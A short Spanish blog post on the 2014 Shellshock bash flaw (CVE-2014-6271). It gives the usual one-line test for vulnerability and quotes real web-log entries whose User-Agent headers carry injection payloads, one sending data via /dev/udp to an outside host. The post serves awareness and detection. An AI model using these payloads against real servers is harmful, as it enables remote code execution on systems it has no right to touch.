Otro fallo gordo de seguridad que compromete la seguridad de miles de máquinas ha sido publicado hace un par de días.
En este caso se trata de un fallo de seguridad en la shell bash que permite inyectar código y ejecutarlo en una variable de entorno.
Para saber si nuestro servidor está comprometido :
[shell]
env x='() { :;}; echo vulnerable’ bash -c ‘echo hello’
[/shell]
Si tu máquina es vulnerable aparecerá en consola
[shell]
vulnerable
hello
[/shell]
Aunque parezca que sólo puede afectar y ser un vector de ataque para usuarios locales, hay que recordar que hay multitud de scripts que chequean y validan por ejemplo logs que almacenan peticiones web, así que como en este ejemplo, podemos inyectar la ejecución de código malicioso sin tener acceso local a la máquina y esperando a los scripts procesen los logs y ejecuten el código inyectado.
[shell]
166.78.61.142 – – [25/Sep/2014:06:28:47 -0400] “GET / HTTP/1.1″ 200 193 “-” “() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444″
24.251.197.244 – – [25/Sep/2014:07:49:36 -0400] “GET / HTTP/1.1″ 200 193 “-” “() { :; }; echo -e x22Content-Type: text/plainx5Cnx22; echo qQQQQQq”
[/shell]
Este es un ejemplo extraído de http://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html
Más información acerca del fallo de seguridad:
https://access.redhat.com/security/cve/CVE-2014-6271
Deja una respuesta